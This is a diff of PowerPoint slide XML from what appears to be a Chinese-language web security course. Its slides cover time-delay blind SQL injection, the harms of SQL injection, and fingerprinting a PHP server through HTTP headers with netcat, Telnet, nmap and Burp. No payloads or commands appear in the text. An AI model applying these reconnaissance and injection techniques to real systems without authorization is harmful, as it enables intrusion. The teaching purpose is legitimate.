+              <a:t>实验举例</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4102189254"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3030886424"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -10026,7 +11945,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="5" name="标题 4"/>
+          <p:cNvPr id="2" name="标题 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -10036,124 +11955,399 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1012925" y="88135"/>
-            <a:ext cx="10364452" cy="1605094"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
+            <a:off x="1050253" y="309604"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>指纹收集 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
+              <a:t>检查</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
+              <a:t>HTTP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>头</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913775" y="2596831"/>
+            <a:ext cx="9622297" cy="4053904"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>SQL</a:t>
+              <a:t>	</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>注入 分类</a:t>
-            </a:r>
+              <a:t>很多</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>信息可以</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>通过使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netcat</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>或</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>Telnet</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>连接到</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>应用程序</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>检索</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="文本占位符 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="half" idx="17"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1446947" y="2465658"/>
-            <a:ext cx="3304928" cy="2847845"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
+          <p:cNvPr id="4" name="文本框 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913775" y="2066640"/>
+            <a:ext cx="8634095" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>时间延误是一种盲目的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入，根据所注入的逻辑，它可以导致</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>引擎执行一个长队列或者是一个时间延误语句</a:t>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>指纹识别可以使用多个工具。通过使用</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
+              <a:t>浏览器，检测该</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>应用程序是用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>PHP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>编写的可能</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="8" name="图片 7"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1912820" y="3499726"/>
+            <a:ext cx="3410762" cy="580954"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="文本框 8"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3058053" y="4402398"/>
+            <a:ext cx="4531057" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>vulnerable</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>攻击</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>者可以衡量页面加载的时间，从而决定所注入的语句是否为真。</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="9" name="文本占位符 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1446947" y="1889396"/>
-            <a:ext cx="3304928" cy="576262"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
+              <a:t>是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>主机名</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>或服务器的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>IP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>地址</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="11" name="直接箭头连接符 10"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm flipV="1">
+            <a:off x="3734631" y="3936960"/>
+            <a:ext cx="86742" cy="506382"/>
+          </a:xfrm>
+          <a:prstGeom prst="straightConnector1">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:tailEnd type="triangle"/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="文本框 13"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4544705" y="5390630"/>
+            <a:ext cx="5854889" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>7.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>时间延误</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>80 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>应用程序使用的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>TCP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>端口（</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>80</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>HTTP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>的默认值）</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="16" name="直接箭头连接符 15"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm flipV="1">
+            <a:off x="4793122" y="3958428"/>
+            <a:ext cx="2" cy="1425496"/>
+          </a:xfrm>
+          <a:prstGeom prst="straightConnector1">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:tailEnd type="triangle"/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3374716175"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841778488"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -10182,126 +12376,203 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="标题 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
+          <p:cNvPr id="5" name="内容占位符 4"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1050253" y="1722555"/>
+            <a:ext cx="10363826" cy="3424107"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>通过</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>发送</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>HTTP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>请求：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>可能</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>会检索到</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>PHP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>版本的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>信息：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="图片 5"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3506835" y="1722555"/>
+            <a:ext cx="2226077" cy="747690"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="7" name="图片 6"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4811688" y="2823433"/>
+            <a:ext cx="3858563" cy="1970041"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="标题 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="872832" y="335408"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
             <a:normAutofit/>
           </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:buNone/>
+              <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
-              <a:t>注入 危害</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>未经授权状况下操作数据库中的数据</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>恶意篡改网页内容</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>私自添加系统帐号或者是数据库使用者帐号</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>网页挂木马</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>指纹收集 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>检查</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>HTTP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>头</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014163891"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3261975159"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -10330,33 +12601,8 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="标题 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
-              <a:t>指纹收集</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2"/>
-          <p:cNvSpPr>
+          <p:cNvPr id="4" name="内容占位符 3"/>
+          <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
@@ -10365,187 +12611,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="825639" y="2214694"/>
-            <a:ext cx="5850583" cy="4053904"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>1.nmap </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>端口</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>2.telnet</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>3.fiddles </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>或 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
-              <a:t>brupsuit</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>查看 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>request </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>headers</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>和服务器的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>response</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
